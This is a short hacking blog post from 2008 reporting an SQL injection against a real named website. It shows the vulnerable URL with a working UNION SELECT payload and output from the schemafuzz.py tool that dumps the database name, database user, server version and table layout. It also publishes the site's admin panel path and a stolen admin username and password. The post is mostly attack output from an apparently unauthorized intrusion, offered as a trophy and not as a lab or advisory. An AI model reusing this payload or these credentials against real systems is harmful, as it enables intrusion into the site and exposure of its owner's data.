viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, October 11, 2008

[SQLi] http://www.tali-kasih.org

12:29 AM Posted by viperfx07 No comments


Tool --> [0] schemafuzz.py v5.0 [1] IntelliTamper v2.07
Admin loc --> http://www.tali-kasih.org/ytk_admin/cmspanel_ytk/
Admin usr/pwd --> novita:omegajesus
Dump:
[+] URL:http://www.tali-kasih.org/detail_berita.php?id=4+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 20:16:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: h45755_ytk
User: h45755_cliff@localhost
Version: 5.0.32-Debian_7etch6

[Database]: h45755_ytk
[Table: Columns]
[0]artikel: id,kode,judul,oleh,deskripsi
[1]berita: id,tanggal,judul,ringkasan,deskripsi
[2]user_admin: id,user_id,password

[-] [20:16:52]
[-] Total URL Requests 15
[-] Done


[+] URL:http://www.tali-kasih.org/detail_berita.php?id=4+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 20:18:46
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: h45755_ytk
User: h45755_cliff@localhost
Version: 5.0.32-Debian_7etch6
[+] Dumping data from database "h45755_ytk" Table "user_admin"
[+] Column(s) ['user_id', 'password']
[+] Number of Rows: 1

[0] novita:omegajesus:

[-] [20:18:47]
[-] Total URL Requests 3
[-] Done

0 comments:

Post a Comment